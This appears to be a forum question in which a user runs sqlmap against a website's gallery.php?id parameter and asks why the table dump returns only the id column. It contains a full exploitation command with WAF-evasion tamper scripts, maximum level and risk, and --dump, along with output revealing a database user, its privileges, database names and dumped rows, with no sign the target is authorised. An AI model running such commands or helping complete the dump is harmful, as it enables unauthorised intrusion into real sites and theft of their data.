I have accessed a database and using --is-dba , I know that the user IS NOT database admin and also using --privileges , I know that the privileges is USAGE . Now I want to know is this the reason that sqlmap is only dumping the ID column of the table?
current user is DBA: False
[12:57:03] [INFO] fetching database users privileges
[12:57:03] [DEBUG] used SQL query returns 1 entry
[12:57:03] [DEBUG] performed 0 queries in 0.01 seconds
database management system users privileges:
[*] 'ch8yluf9_cms'@'localhost' [1]:
privilege: USAGE
[12:57:03] [INFO] fetching database names
[12:57:03] [DEBUG] used SQL query returns 2 entries
[12:57:03] [DEBUG] performed 0 queries in 0.02 seconds
available databases [2]:
[*] ch8yluf9_cms
[*] information_schema
Here is the command I'm using :
python sqlmap.py -u 'https://URL.com/gallery.php?id=5' --identify-waf --tamper=between,randomcase,space2comment -v 3 --random-agent --level 5 --risk 3 -D ch8yluf9_cms -T details --dump --batch
The output I'm getting is like :
[57 entries]
+----+
| id |
+----+
| 1 |
| 2 |
| 3 |
| 4 |
| 5 |
| 6 |
| 7 |
| 8 |
| 9 |
| 10 |
| 11 |
| 12 |
| 13 |
| 14 |
| 15 |
| 16 |
For some reason, sqlmap is only getting the ID column of the table. Is this because of lack of permissions? If so, how come it can get all the table names?